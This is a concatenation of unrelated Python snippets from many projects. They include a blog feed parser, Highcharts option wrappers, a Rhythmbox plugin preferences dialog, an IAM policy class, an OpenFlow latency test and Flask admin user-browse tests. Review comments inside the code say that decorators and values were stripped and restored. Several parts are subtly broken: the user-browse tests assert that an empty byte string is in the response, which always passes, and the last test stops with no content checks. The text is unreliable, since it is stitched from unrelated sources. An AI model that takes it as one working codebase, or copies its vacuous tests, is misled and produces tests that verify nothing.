def extractBarrykaizerBlogspotCom(item):
    """Feed parser for barrykaizer.blogspot.com release items.

    Returns a release message for recognised tags, None for previews or
    items without a chapter/volume, and False when no tag matches.
    """
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    if not (chp or vol) or 'preview' in item['title'].lower():
        return None
    tagmap = [
        ('PRC', 'PRC', 'translated'),
        ('Loiterous', 'Loiterous', 'oel'),
    ]
    for tagname, name, tl_type in tagmap:
        if tagname in item['tags']:
            return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
    return False
def make_request_args(tasks):
    """Merge a batch of per-prompt tasks into one batched request dict.

    The first task acts as the template; prompts/futures/request_ids become
    lists, streaming is forced on, the timeout is the max of any explicit
    per-task timeouts (else None), and the first explicit api_config wins.
    """
    batched = tasks[0].copy()
    del batched['future']
    batched['prompt'] = [task['prompt'] for task in tasks]
    batched['futures'] = [task['future'] for task in tasks]
    batched['request_id'] = [task['request_id'] for task in tasks]
    batched['stream'] = True
    explicit_timeouts = [task['timeout'] for task in tasks if task.get('timeout') is not None]
    batched['timeout'] = max(explicit_timeouts) if explicit_timeouts else None
    explicit_configs = [task['api_config'] for task in tasks if task.get('api_config') is not None]
    if explicit_configs:
        batched['api_config'] = explicit_configs[0]
    return batched
def test_oidcclient_has_cookie(client):
    """has_cookie must honour both cookie presence and the domain filter."""
    jar = client.client.cookies
    jar.clear()
    # No cookies at all.
    assert (client.has_cookie('foo') is False)
    jar.set('foo', 'bar', domain='localhost.local')
    # Present, with and without a matching domain filter.
    assert (client.has_cookie('foo') is True)
    assert (client.has_cookie('foo', domain='localhost') is True)
    assert (client.has_cookie('foo', domain='example.com') is False)
class Preferences(GObject.Object, PeasGtk.Configurable):
    """Preferences dialog for the Alternative Toolbar Rhythmbox plugin.

    Builds the configuration widget from the GtkBuilder UI file and binds
    each control to the corresponding GSettings key.
    """
    __gtype_name__ = 'AlternativeToolbarPreferences'
    object = GObject.property(type=GObject.Object)

    def __init__(self):
        GObject.Object.__init__(self)
        self.gs = GSetting()
        self.plugin_settings = self.gs.get_setting(self.gs.Path.PLUGIN)

    def do_create_configure_widget(self):
        """Create and return the preferences box, wiring widgets to settings."""
        print('DEBUG - create_display_contents')
        self._first_run = True
        cl = CoverLocale()
        cl.switch_locale(cl.Locale.LOCALE_DOMAIN)
        builder = Gtk.Builder()
        builder.set_translation_domain(cl.Locale.LOCALE_DOMAIN)
        builder.add_from_file(rb.find_plugin_file(self, 'ui/altpreferences.ui'))
        builder.connect_signals(self)
        # START_HIDDEN is stored inverted relative to the checkbox state.
        start_hidden = builder.get_object('start_hidden_checkbox')
        start_hidden.set_active((not self.plugin_settings[self.gs.PluginKey.START_HIDDEN]))
        start_hidden.connect('toggled', self._start_hidden_checkbox_toggled)
        self._show_compact = builder.get_object('show_compact_checkbox')
        self.plugin_settings.bind(self.gs.PluginKey.SHOW_COMPACT, self._show_compact, 'active', Gio.SettingsBindFlags.DEFAULT)
        self._show_compact.connect('toggled', self._show_compact_checkbox_toggled)
        self._compact_pos = builder.get_object('compact_pos_combobox')
        self.plugin_settings.bind(self.gs.PluginKey.COMPACT_POS, self._compact_pos, 'active', Gio.SettingsBindFlags.DEFAULT)
        self._playing_label = builder.get_object('playing_label_checkbox')
        self.plugin_settings.bind(self.gs.PluginKey.PLAYING_LABEL, self._playing_label, 'active', Gio.SettingsBindFlags.DEFAULT)
        self._inline_label = builder.get_object('inline_label_checkbox')
        self.plugin_settings.bind(self.gs.PluginKey.INLINE_LABEL, self._inline_label, 'active', Gio.SettingsBindFlags.DEFAULT)
        volume_control = builder.get_object('volume_control_checkbox')
        self.plugin_settings.bind(self.gs.PluginKey.VOLUME_CONTROL, volume_control, 'active', Gio.SettingsBindFlags.DEFAULT)
        self._enhanced_sidebar = builder.get_object('enhanced_sidebar_checkbox')
        self.plugin_settings.bind(self.gs.PluginKey.ENHANCED_SIDEBAR, self._enhanced_sidebar, 'active', Gio.SettingsBindFlags.DEFAULT)
        self._show_tooltips = builder.get_object('tooltips_checkbox')
        self.plugin_settings.bind(self.gs.PluginKey.SHOW_TOOLTIPS, self._show_tooltips, 'active', Gio.SettingsBindFlags.DEFAULT)
        self._dark_theme = builder.get_object('dark_theme_checkbox')
        self.plugin_settings.bind(self.gs.PluginKey.DARK_THEME, self._dark_theme, 'active', Gio.SettingsBindFlags.DEFAULT)
        modern_switch = builder.get_object('modern_switch')
        modern_switch.connect('notify', self._modern_switch_state)
        default = Gtk.Settings.get_default()
        # DISPLAY_TYPE: 0 = follow the shell's capabilities, 1 = modern, 2 = classic.
        display_type = self.plugin_settings[self.gs.PluginKey.DISPLAY_TYPE]
        if (display_type == 0):
            if ((not default.props.gtk_shell_shows_app_menu) or default.props.gtk_shell_shows_menubar):
                modern_switch.set_active(False)
            else:
                modern_switch.set_active(True)
        elif (display_type == 1):
            modern_switch.set_active(True)
        else:
            modern_switch.set_active(False)
        if modern_switch.get_active():
            # Modern mode implies the compact toolbar.
            self._show_compact.set_active(True)
            self._show_compact_checkbox_toggled(self._show_compact)
        infobar = builder.get_object('infobar')
        button = infobar.add_button(_('Restart'), 1)
        button.connect('clicked', self._restart_button_clicked)
        self._category_pos = builder.get_object('category_combobox')
        self.plugin_settings.bind(self.gs.PluginKey.HORIZ_CATEGORIES, self._category_pos, 'active', Gio.SettingsBindFlags.DEFAULT)
        self._first_run = False
        return builder.get_object('preferences_box')

    def _restart_button_clicked(self, *args):
        # Replace the current process with a fresh rhythmbox instance.
        exepath = shutil.which('rhythmbox')
        os.execl(exepath, exepath, *sys.argv)

    def _start_hidden_checkbox_toggled(self, toggle_button):
        # Stored value is the inverse of the checkbox state.
        self.plugin_settings[self.gs.PluginKey.START_HIDDEN] = (not toggle_button.get_active())

    def _show_compact_checkbox_toggled(self, toggle_button):
        # Compact-only options are only meaningful when compact mode is on.
        enabled = toggle_button.get_active()
        self._show_tooltips.set_sensitive(enabled)
        self._inline_label.set_sensitive(enabled)
        self._playing_label.set_sensitive(enabled)

    def _modern_switch_state(self, switch, param):
        # Modern mode forces compact and disables the related controls.
        state = switch.get_active()
        self._show_compact.set_sensitive((not state))
        self._compact_pos.set_sensitive((not state))
        if state:
            self._show_compact.set_active(True)
            self.plugin_settings[self.gs.PluginKey.DISPLAY_TYPE] = 1
        else:
            self.plugin_settings[self.gs.PluginKey.DISPLAY_TYPE] = 2
class IamPolicy(object):
    """An IAM policy: a list of bindings plus optional audit configs.

    NOTE(review): ``create_from`` takes ``cls`` but carried no
    ``@classmethod`` decorator (evidently stripped); it is restored here.
    """

    def __init__(self):
        # Optional IamAuditConfig, set only when 'auditConfigs' is present.
        self.audit_configs = None
        # List of IamPolicyBinding objects.
        self.bindings = []

    @classmethod
    def create_from(cls, policy_json):
        """Build an IamPolicy from a decoded policy JSON dict.

        :raises errors.InvalidIamPolicyError: if *policy_json* is falsy.
        """
        policy = cls()
        if (not policy_json):
            raise errors.InvalidIamPolicyError('Invalid policy {}'.format(policy_json))
        policy.bindings = [IamPolicyBinding.create_from(b) for b in policy_json.get('bindings', [])]
        if ('auditConfigs' in policy_json):
            policy.audit_configs = IamAuditConfig.create_from(policy_json.get('auditConfigs'))
        return policy

    def __eq__(self, other):
        if (not isinstance(other, type(self))):
            return NotImplemented
        return ((self.bindings == other.bindings) and (self.audit_configs == other.audit_configs))

    def __ne__(self, other):
        return (not (self == other))

    def __repr__(self):
        if self.audit_configs:
            return 'IamPolicy: <bindings={}, audit_configs={}>'.format(self.bindings, self.audit_configs)
        return 'IamPolicy: <bindings={}>'.format(self.bindings)

    def is_empty(self):
        """True when the policy carries no bindings at all."""
        return (not bool(self.bindings))
def test_extruded_ope_hits_cache():
    """Two FunctionSpaces built from independently constructed but identical
    elements on the same extruded mesh must hit the caches and compare equal."""
    m = UnitSquareMesh(1, 1)
    e = ExtrudedMesh(m, 2, layer_height=1)
    U0 = FiniteElement('DG', 'triangle', 0)
    U1 = FiniteElement('CG', 'interval', 2)
    W0 = TensorProductElement(U0, U1)
    W1 = FunctionSpace(e, HDiv(W0))
    # Deliberately rebuild identical elements from scratch (rather than
    # reusing the objects above) so equality must come via caching, not
    # object identity.
    U0 = FiniteElement('DG', 'triangle', 0)
    U1 = FiniteElement('CG', 'interval', 2)
    W0 = TensorProductElement(U0, U1)
    W2 = FunctionSpace(e, HDiv(W0))
    assert (W1 == W2)
    assert (W1.topological == W2.topological)
    assert (W1._shared_data == W2._shared_data)
class OptionPlotoptionsPyramidSonificationContexttracksMappingHighpassResonance(Options):
    """Accessors for the highpass resonance mapping options (Highcharts sonification).

    NOTE(review): each accessor was defined twice (getter then setter), which
    in plain Python silently discards the getter -- the @property /
    @<name>.setter decorators appear to have been stripped from this
    generated file and are restored here.
    """

    @property
    def mapFunction(self):
        # Current configured value, or None when unset.
        return self._config_get(None)

    @mapFunction.setter
    def mapFunction(self, value: Any):
        self._config(value, js_type=False)

    @property
    def mapTo(self):
        return self._config_get(None)

    @mapTo.setter
    def mapTo(self, text: str):
        self._config(text, js_type=False)

    @property
    def max(self):
        return self._config_get(None)

    @max.setter
    def max(self, num: float):
        self._config(num, js_type=False)

    @property
    def min(self):
        return self._config_get(None)

    @min.setter
    def min(self, num: float):
        self._config(num, js_type=False)

    @property
    def within(self):
        return self._config_get(None)

    @within.setter
    def within(self, value: Any):
        self._config(value, js_type=False)
def test_is_valid_quarter():
    """Only the integers 1-4 are valid quarters; everything else is rejected."""
    for quarter in (1, 2, 3, 4):
        assert (fyh.is_valid_quarter(quarter) is True)
    for bad_value in (0, 5, None, '1', 'a', {'hello': 'there'}):
        assert (fyh.is_valid_quarter(bad_value) is False)
class OptionExportingButtonsContextbutton(Options):
    """Generated wrapper for the Highcharts ``exporting.buttons.contextButton``
    option group.

    Each option is a property pair backed by ``_config_get`` (argument is the
    Highcharts default) and ``_config``. Fixes two defects: the bare
    ``_titleKey.setter`` expression raised AttributeError at class creation,
    and every getter/setter pair was missing its ``@property`` /
    ``@<name>.setter`` decorators, so setters shadowed getters.
    """

    @property
    def _titleKey(self):
        """Deprecated alias of :attr:`titleKey` (default: None)."""
        return self._config_get(None)

    @_titleKey.setter
    def _titleKey(self, text: str):
        self._config(text, js_type=False)

    @property
    def align(self):
        """Horizontal alignment of the button (default: 'right')."""
        return self._config_get('right')

    @align.setter
    def align(self, text: str):
        self._config(text, js_type=False)

    @property
    def buttonSpacing(self):
        """Pixel spacing between buttons (default: 3)."""
        return self._config_get(3)

    @buttonSpacing.setter
    def buttonSpacing(self, num: float):
        self._config(num, js_type=False)

    @property
    def className(self):
        """CSS class of the button (default: 'highcharts-contextbutton')."""
        return self._config_get('highcharts-contextbutton')

    @className.setter
    def className(self, text: str):
        self._config(text, js_type=False)

    @property
    def enabled(self):
        """Whether the button is shown (default: True)."""
        return self._config_get(True)

    @enabled.setter
    def enabled(self, flag: bool):
        self._config(flag, js_type=False)

    @property
    def height(self):
        """Pixel height of the button (default: 28)."""
        return self._config_get(28)

    @height.setter
    def height(self, num: float):
        self._config(num, js_type=False)

    @property
    def menuClassName(self):
        """CSS class of the popup menu (default: 'highcharts-contextmenu')."""
        return self._config_get('highcharts-contextmenu')

    @menuClassName.setter
    def menuClassName(self, text: str):
        self._config(text, js_type=False)

    @property
    def menuItems(self):
        """Items shown in the context menu (default: full export list)."""
        return self._config_get(['viewFullscreen', 'printChart', 'separator', 'downloadPNG', 'downloadJPEG', 'downloadPDF', 'downloadSVG'])

    @menuItems.setter
    def menuItems(self, value: Any):
        self._config(value, js_type=False)

    @property
    def onclick(self):
        """Click handler for the button (default: None)."""
        return self._config_get(None)

    @onclick.setter
    def onclick(self, value: Any):
        self._config(value, js_type=False)

    @property
    def symbol(self):
        """Symbol drawn on the button (default: 'menu')."""
        return self._config_get('menu')

    @symbol.setter
    def symbol(self, text: str):
        self._config(text, js_type=False)

    @property
    def symbolFill(self):
        """Fill color of the symbol (default: '#666666')."""
        return self._config_get('#666666')

    @symbolFill.setter
    def symbolFill(self, text: str):
        self._config(text, js_type=False)

    @property
    def symbolSize(self):
        """Pixel size of the symbol (default: 14)."""
        return self._config_get(14)

    @symbolSize.setter
    def symbolSize(self, num: float):
        self._config(num, js_type=False)

    @property
    def symbolStroke(self):
        """Stroke color of the symbol (default: '#666666')."""
        return self._config_get('#666666')

    @symbolStroke.setter
    def symbolStroke(self, text: str):
        self._config(text, js_type=False)

    @property
    def symbolStrokeWidth(self):
        """Stroke width of the symbol (default: 3)."""
        return self._config_get(3)

    @symbolStrokeWidth.setter
    def symbolStrokeWidth(self, num: float):
        self._config(num, js_type=False)

    @property
    def symbolX(self):
        """X offset of the symbol (default: 14.5)."""
        return self._config_get(14.5)

    @symbolX.setter
    def symbolX(self, num: float):
        self._config(num, js_type=False)

    @property
    def symbolY(self):
        """Y offset of the symbol (default: 13.5)."""
        return self._config_get(13.5)

    @symbolY.setter
    def symbolY(self, num: float):
        self._config(num, js_type=False)

    @property
    def text(self):
        """Text shown next to the symbol (default: 'null')."""
        return self._config_get('null')

    @text.setter
    def text(self, text: str):
        self._config(text, js_type=False)

    @property
    def theme(self) -> 'OptionExportingButtonsContextbuttonTheme':
        """Nested ``theme`` option group (getter only)."""
        return self._config_sub_data('theme', OptionExportingButtonsContextbuttonTheme)

    @property
    def titleKey(self):
        """Key of the tooltip title in the lang section (default: 'contextButtonTitle')."""
        return self._config_get('contextButtonTitle')

    @titleKey.setter
    def titleKey(self, text: str):
        self._config(text, js_type=False)

    @property
    def useHTML(self):
        """Render the button text as HTML (default: False)."""
        return self._config_get(False)

    @useHTML.setter
    def useHTML(self, flag: bool):
        self._config(flag, js_type=False)

    @property
    def verticalAlign(self):
        """Vertical alignment of the button (default: 'top')."""
        return self._config_get('top')

    @verticalAlign.setter
    def verticalAlign(self, text: str):
        self._config(text, js_type=False)

    @property
    def width(self):
        """Pixel width of the button (default: 28)."""
        return self._config_get(28)

    @width.setter
    def width(self, num: float):
        self._config(num, js_type=False)

    @property
    def x(self):
        """Horizontal pixel offset of the button (default: -10)."""
        return self._config_get((- 10))

    @x.setter
    def x(self, num: float):
        self._config(num, js_type=False)

    @property
    def y(self):
        """Vertical pixel offset of the button (default: 0)."""
        return self._config_get(0)

    @y.setter
    def y(self, num: float):
        self._config(num, js_type=False)
def test_align_convert_degen_bases(o_dir, e_dir, request):
    """Run phyluce_align_convert_degen_bases on the fixture alignments and
    compare every produced nexus file against the expected output."""
    program = 'bin/align/phyluce_align_convert_degen_bases'
    output = os.path.join(o_dir, 'mafft-degen-bases-converted')
    cmd = [
        os.path.join(request.config.rootdir, program),
        '--alignments', os.path.join(e_dir, 'mafft-degen-bases'),
        '--output', output,
        '--input-format', 'fasta',
        '--output-format', 'nexus',
        '--cores', '1',
    ]
    proc = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    (stdout, stderr) = proc.communicate()
    # Surface the program's stderr when it exits non-zero.
    assert (proc.returncode == 0), print('{}'.format(stderr.decode('utf-8')))
    produced = glob.glob(os.path.join(output, '*'))
    assert produced, 'There are no output files'
    for produced_path in produced:
        basename = os.path.basename(produced_path)
        print(basename)
        expected_path = os.path.join(e_dir, 'mafft-degen-bases-converted', basename)
        assert (open(produced_path).read() == open(expected_path).read())
class DashCustom(Dash):
    """Dash subclass whose client-side ``requests_pathname_prefix`` can differ
    from the server-side one (``requests_pathname_external_prefix``)."""

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # Default the external prefix to the configured internal prefix.
        self.requests_pathname_external_prefix = self.config.requests_pathname_prefix

    def _config(self):
        """Build the client config, substituting the external prefix."""
        cfg = super()._config()
        cfg['url_base_pathname'] = self.config.url_base_pathname
        cfg['requests_pathname_prefix'] = self.requests_pathname_external_prefix
        cfg['ui'] = self._dev_tools.ui
        cfg['props_check'] = self._dev_tools.props_check
        cfg['show_undo_redo'] = self.config.show_undo_redo
        cfg['suppress_callback_exceptions'] = self.config.suppress_callback_exceptions
        cfg['update_title'] = self.config.update_title
        if self._dev_tools.hot_reload:
            cfg['hot_reload'] = {
                'interval': int(self._dev_tools.hot_reload_interval * 1000),
                'max_retry': self._dev_tools.hot_reload_max_retry,
            }
        if self.validation_layout and not self.config.suppress_callback_exceptions:
            cfg['validation_layout'] = self.validation_layout
        return cfg
class OptionSeriesWindbarbSonificationTracksMappingLowpass(Options):
    """Generated wrapper for the Highcharts option group suggested by the
    class name (windbarb series sonification lowpass-filter mapping)."""

    def frequency(self) -> 'OptionSeriesWindbarbSonificationTracksMappingLowpassFrequency':
        """Return the nested ``frequency`` option group via ``_config_sub_data``.

        NOTE(review): sibling generated classes expose such accessors as
        properties; this one is a plain method — confirm generator intent.
        """
        return self._config_sub_data('frequency', OptionSeriesWindbarbSonificationTracksMappingLowpassFrequency)

    def resonance(self) -> 'OptionSeriesWindbarbSonificationTracksMappingLowpassResonance':
        """Return the nested ``resonance`` option group via ``_config_sub_data``."""
        return self._config_sub_data('resonance', OptionSeriesWindbarbSonificationTracksMappingLowpassResonance)
def get_bert_feature(text, word2ph):
    """Extract a phone-level BERT feature matrix for *text*.

    Runs the (module-level) tokenizer/model, takes one hidden-state layer,
    then repeats each token's feature vector by its phone count from
    *word2ph*. Returns the transposed feature tensor.

    NOTE(review): assumes word2ph has len(text) + 2 entries — one per
    character plus the tokenizer's two special tokens; asserted below.
    """
    with torch.no_grad():
        encoded = tokenizer(text, return_tensors='pt')
        # Move every input tensor onto the model's device.
        for key in list(encoded.keys()):
            encoded[key] = encoded[key].to(device)
        outputs = model(**encoded, output_hidden_states=True)
        # Keep only the third-from-last hidden layer, first batch element.
        hidden = torch.cat(outputs['hidden_states'][-3:-2], -1)[0].cpu()
    assert len(word2ph) == len(text) + 2
    per_phone = [hidden[token_idx].repeat(count, 1)
                 for token_idx, count in enumerate(word2ph)]
    return torch.cat(per_phone, dim=0).T
def parse_var_keywords(test_str: str) -> tuple[list[str], str]:
    """Strip leading Fortran variable keywords off *test_str*.

    Repeatedly matches ``FRegex.KEYWORD_LIST``; a ``dimension`` keyword also
    consumes its parenthesized shape (aborting if the parens are unbalanced).
    Returns the upper-cased keywords and the remaining string.
    """
    keywords: list[str] = []
    match = FRegex.KEYWORD_LIST.match(test_str)
    while match:
        keyword = re.sub('^[, ]*', '', match.group(0))
        test_str = test_str[match.end(0):]
        if keyword.lower().startswith('dimension'):
            close_idx = find_paren_match(test_str)
            if close_idx < 0:
                # Unbalanced parentheses: stop parsing keywords entirely.
                break
            keyword += test_str[:close_idx + 1]
            test_str = test_str[close_idx + 1:]
        keyword = re.sub('^[, ]*', '', keyword)
        keywords.append(keyword.strip().upper())
        match = FRegex.KEYWORD_LIST.match(test_str)
    return keywords, test_str
class DebugConfig():
    """Process-wide debug settings (singleton via :meth:`get_instance`).

    Holds a debugging on/off flag and an optional directory for debug
    artifacts. Directory operations are no-ops while debugging is off.
    """

    # Lazily-created singleton; access through get_instance().
    instance = None

    def __init__(self):
        self.debug_dir = None
        self.debugging = False

    def set_debugging(self, debugging):
        """Enable or disable debugging output."""
        self.debugging = debugging

    def set_debug_dir(self, debug_dir):
        """Record (and create, if missing) the debug output directory."""
        if not self.debugging:
            return
        self.debug_dir = debug_dir
        if not os.path.isdir(debug_dir):
            os.mkdir(debug_dir)

    def clear_debug_dir(self):
        """Remove and re-create the debug directory, emptying it."""
        if not self.debugging:
            return
        # Guard against debug_dir never having been set: os.path.isdir(None)
        # raises TypeError.
        if self.debug_dir and os.path.isdir(self.debug_dir):
            shutil.rmtree(self.debug_dir)
            os.mkdir(self.debug_dir)

    @staticmethod
    def get_instance():
        """Return the shared DebugConfig, creating it on first use."""
        if not DebugConfig.instance:
            DebugConfig.instance = DebugConfig()
        return DebugConfig.instance
class DataplaneLatency(base_tests.SimpleDataPlane):
    """Measure dataplane round-trip latency through one wildcard flow and
    check it stays below the configured timeouts."""

    def runTest(self):
        (in_port, out_port) = openflow_ports(2)
        delete_all_flows(self.controller)
        pkt = str(simple_tcp_packet())
        # The buffer_id value was missing (syntax error). OFP_NO_BUFFER is the
        # conventional "packet not buffered" sentinel for flow_add requests.
        request = ofp.message.flow_add(
            match=ofp.match(wildcards=ofp.OFPFW_ALL),
            buffer_id=ofp.OFP_NO_BUFFER,
            actions=[ofp.action.output(out_port)])
        self.controller.message_send(request)
        do_barrier(self.controller)
        latencies = []
        # xrange: this test suite targets Python 2.
        for i in xrange(0, 1000):
            start_time = time.time()
            self.dataplane.send(in_port, pkt)
            verify_packet(self, pkt, out_port)
            end_time = time.time()
            latencies.append(end_time - start_time)
        latencies.sort()
        latency_min = latencies[0]
        latency_90 = latencies[int(len(latencies) * 0.9)]
        latency_max = latencies[-1]
        logging.debug('Minimum latency: %f ms', latency_min * 1000.0)
        logging.debug('90%% latency: %f ms', latency_90 * 1000.0)
        logging.debug('Maximum latency: %f ms', latency_max * 1000.0)
        # Worst case must beat the positive timeout; the 90th percentile must
        # beat the (tighter) negative timeout.
        self.assertGreater(config['default_timeout'], latency_max)
        self.assertGreater(config['default_negative_timeout'], latency_90)
def test_raises_error_when_variables_not_datetime(df_datetime):
    """DatetimeFeatures rejects non-datetime variables with TypeError and a
    frame with no datetime columns at all with ValueError."""
    for bad_variables in (['Age'], ['Name', 'Age', 'date_obj1'], 'index'):
        with pytest.raises(TypeError):
            DatetimeFeatures(variables=bad_variables).fit(df_datetime)
    with pytest.raises(ValueError):
        DatetimeFeatures().fit(df_datetime[['Name', 'Age']])
class OptionSeriesItemSonificationDefaultinstrumentoptionsMapping(Options):
    """Generated wrapper for the Highcharts option group suggested by the
    class name. Each accessor returns a nested option group via
    ``_config_sub_data`` (sub-group name, wrapper class).

    NOTE(review): sibling generated classes expose these as properties; here
    they are plain methods — confirm generator intent.
    """

    def frequency(self) -> 'OptionSeriesItemSonificationDefaultinstrumentoptionsMappingFrequency':
        """Nested ``frequency`` mapping options."""
        return self._config_sub_data('frequency', OptionSeriesItemSonificationDefaultinstrumentoptionsMappingFrequency)

    def gapBetweenNotes(self) -> 'OptionSeriesItemSonificationDefaultinstrumentoptionsMappingGapbetweennotes':
        """Nested ``gapBetweenNotes`` mapping options."""
        return self._config_sub_data('gapBetweenNotes', OptionSeriesItemSonificationDefaultinstrumentoptionsMappingGapbetweennotes)

    def highpass(self) -> 'OptionSeriesItemSonificationDefaultinstrumentoptionsMappingHighpass':
        """Nested ``highpass`` filter mapping options."""
        return self._config_sub_data('highpass', OptionSeriesItemSonificationDefaultinstrumentoptionsMappingHighpass)

    def lowpass(self) -> 'OptionSeriesItemSonificationDefaultinstrumentoptionsMappingLowpass':
        """Nested ``lowpass`` filter mapping options."""
        return self._config_sub_data('lowpass', OptionSeriesItemSonificationDefaultinstrumentoptionsMappingLowpass)

    def noteDuration(self) -> 'OptionSeriesItemSonificationDefaultinstrumentoptionsMappingNoteduration':
        """Nested ``noteDuration`` mapping options."""
        return self._config_sub_data('noteDuration', OptionSeriesItemSonificationDefaultinstrumentoptionsMappingNoteduration)

    def pan(self) -> 'OptionSeriesItemSonificationDefaultinstrumentoptionsMappingPan':
        """Nested ``pan`` mapping options."""
        return self._config_sub_data('pan', OptionSeriesItemSonificationDefaultinstrumentoptionsMappingPan)

    def pitch(self) -> 'OptionSeriesItemSonificationDefaultinstrumentoptionsMappingPitch':
        """Nested ``pitch`` mapping options."""
        return self._config_sub_data('pitch', OptionSeriesItemSonificationDefaultinstrumentoptionsMappingPitch)

    def playDelay(self) -> 'OptionSeriesItemSonificationDefaultinstrumentoptionsMappingPlaydelay':
        """Nested ``playDelay`` mapping options."""
        return self._config_sub_data('playDelay', OptionSeriesItemSonificationDefaultinstrumentoptionsMappingPlaydelay)

    def time(self) -> 'OptionSeriesItemSonificationDefaultinstrumentoptionsMappingTime':
        """Nested ``time`` mapping options."""
        return self._config_sub_data('time', OptionSeriesItemSonificationDefaultinstrumentoptionsMappingTime)

    def tremolo(self) -> 'OptionSeriesItemSonificationDefaultinstrumentoptionsMappingTremolo':
        """Nested ``tremolo`` mapping options."""
        return self._config_sub_data('tremolo', OptionSeriesItemSonificationDefaultinstrumentoptionsMappingTremolo)

    def volume(self) -> 'OptionSeriesItemSonificationDefaultinstrumentoptionsMappingVolume':
        """Nested ``volume`` mapping options."""
        return self._config_sub_data('volume', OptionSeriesItemSonificationDefaultinstrumentoptionsMappingVolume)
class OptionSeriesHeatmapSonificationTracksMappingTremoloSpeed(Options):
    """Generated wrapper for the Highcharts option group suggested by the class name.

    Each option is a property pair backed by ``_config_get`` (argument is the
    default) and ``_config``. The ``@property`` / ``@<name>.setter`` decorators
    were missing, so each setter definition silently shadowed its getter;
    restored here.
    """

    @property
    def mapFunction(self):
        """Custom mapping function (default: None)."""
        return self._config_get(None)

    @mapFunction.setter
    def mapFunction(self, value: Any):
        self._config(value, js_type=False)

    @property
    def mapTo(self):
        """Point property to map the tremolo speed to (default: None)."""
        return self._config_get(None)

    @mapTo.setter
    def mapTo(self, text: str):
        self._config(text, js_type=False)

    @property
    def max(self):
        """Maximum mapped value (default: None)."""
        return self._config_get(None)

    @max.setter
    def max(self, num: float):
        self._config(num, js_type=False)

    @property
    def min(self):
        """Minimum mapped value (default: None)."""
        return self._config_get(None)

    @min.setter
    def min(self, num: float):
        self._config(num, js_type=False)

    @property
    def within(self):
        """Range the mapping operates within (default: None)."""
        return self._config_get(None)

    @within.setter
    def within(self, value: Any):
        self._config(value, js_type=False)
class BrowseUsersTests(DatabaseTestCase):
    """Integration tests for the ``/users`` admin browse view: access control,
    pagination, and the user_id/username/email/admin/active filters.

    NOTE(review): the empty ``b''`` assertion payloads and ``email=''`` values
    look like fixture strings stripped from the original file — restore the
    expected usernames/emails before trusting these assertions, since
    ``b'' in data`` is vacuously True.
    """

    def setUp(self):
        """Create one regular user and one admin user (each with a
        social-auth row) and a Flask test client."""
        super().setUp()
        session = Session()
        self.user = models.User(email='', username='user')
        user_social_auth = social_models.UserSocialAuth(user_id=self.user.id, user=self.user)
        session.add(self.user)
        session.add(user_social_auth)
        self.admin = models.User(email='', username='admin', admin=True)
        admin_social_auth = social_models.UserSocialAuth(user_id=self.admin.id, user=self.admin)
        session.add_all([admin_social_auth, self.admin])
        session.commit()
        self.client = self.flask_app.test_client()

    def test_non_admin_get(self):
        """A non-admin user is rejected with 401."""
        with login_user(self.flask_app, self.user):
            output = self.client.get('/users')
            self.assertEqual(401, output.status_code)

    def test_admin_get(self):
        """An admin can load the page and sees both users."""
        with login_user(self.flask_app, self.admin):
            output = self.client.get('/users')
            self.assertEqual(200, output.status_code)
            self.assertTrue((b'' in output.data))
            self.assertTrue((b'' in output.data))

    def test_pages(self):
        """limit=1&page=1 shows only the first user."""
        with login_user(self.flask_app, self.admin):
            page_one = self.client.get('/users?limit=1&page=1')
            self.assertEqual(200, page_one.status_code)
            self.assertTrue((b'' in page_one.data))
            self.assertFalse((b'' in page_one.data))

    def test_pagination_offset(self):
        """limit=1&page=2 shows only the second user."""
        with login_user(self.flask_app, self.admin):
            page = self.client.get('/users?limit=1&page=2')
            self.assertEqual(200, page.status_code)
            self.assertFalse((b'' in page.data))
            self.assertTrue((b'' in page.data))

    def test_pagination_limit_zero(self):
        """limit=0 falls back to showing all users."""
        with login_user(self.flask_app, self.admin):
            page = self.client.get('/users?limit=0&page=1')
            self.assertEqual(200, page.status_code)
            self.assertTrue((b'' in page.data))
            self.assertTrue((b'' in page.data))

    def test_pagination_limit_negative(self):
        """A negative limit falls back to showing all users."""
        with login_user(self.flask_app, self.admin):
            page = self.client.get('/users?limit=-1')
            self.assertEqual(200, page.status_code)
            self.assertTrue((b'' in page.data))
            self.assertTrue((b'' in page.data))

    def test_pagination_invalid_page(self):
        """A non-numeric page value is treated as page 1."""
        with login_user(self.flask_app, self.admin):
            page_one = self.client.get('/users?limit=1&page=dummy')
            self.assertEqual(200, page_one.status_code)
            self.assertTrue((b'' in page_one.data))
            self.assertFalse((b'' in page_one.data))

    def test_pagination_invalid_limit(self):
        """A non-numeric limit is ignored; all users are shown."""
        with login_user(self.flask_app, self.admin):
            page_one = self.client.get('/users?limit=dummy&page=1')
            self.assertEqual(200, page_one.status_code)
            self.assertTrue((b'' in page_one.data))
            self.assertTrue((b'' in page_one.data))

    def test_filter_user_id(self):
        """Filtering by the admin's id returns only the admin."""
        with login_user(self.flask_app, self.admin):
            output = self.client.get(f'/users?user_id={six.text_type(self.admin.id)}')
            self.assertEqual(200, output.status_code)
            self.assertTrue((b'' in output.data))
            self.assertFalse((b'' in output.data))

    def test_filter_user_id_wrong(self):
        """An unparseable user_id matches nobody."""
        with login_user(self.flask_app, self.admin):
            output = self.client.get('/users?user_id=dummy')
            self.assertEqual(200, output.status_code)
            self.assertFalse((b'' in output.data))
            self.assertFalse((b'' in output.data))

    def test_filter_username(self):
        """Filtering by the admin's username returns only the admin."""
        with login_user(self.flask_app, self.admin):
            output = self.client.get(f'/users?username={self.admin.username}')
            self.assertEqual(200, output.status_code)
            self.assertTrue((b'' in output.data))
            self.assertFalse((b'' in output.data))

    def test_filter_username_wrong(self):
        """An unknown username matches nobody."""
        with login_user(self.flask_app, self.admin):
            output = self.client.get('/users?username=dummy')
            self.assertEqual(200, output.status_code)
            self.assertFalse((b'' in output.data))
            self.assertFalse((b'' in output.data))

    def test_filter_email(self):
        """Filtering by the admin's email returns only the admin."""
        with login_user(self.flask_app, self.admin):
            output = self.client.get(f'/users?email={self.admin.email}')
            self.assertEqual(200, output.status_code)
            self.assertTrue((b'' in output.data))
            self.assertFalse((b'' in output.data))

    def test_filter_email_wrong(self):
        """An unknown email matches nobody."""
        with login_user(self.flask_app, self.admin):
            output = self.client.get('/users?email=dummy')
            self.assertEqual(200, output.status_code)
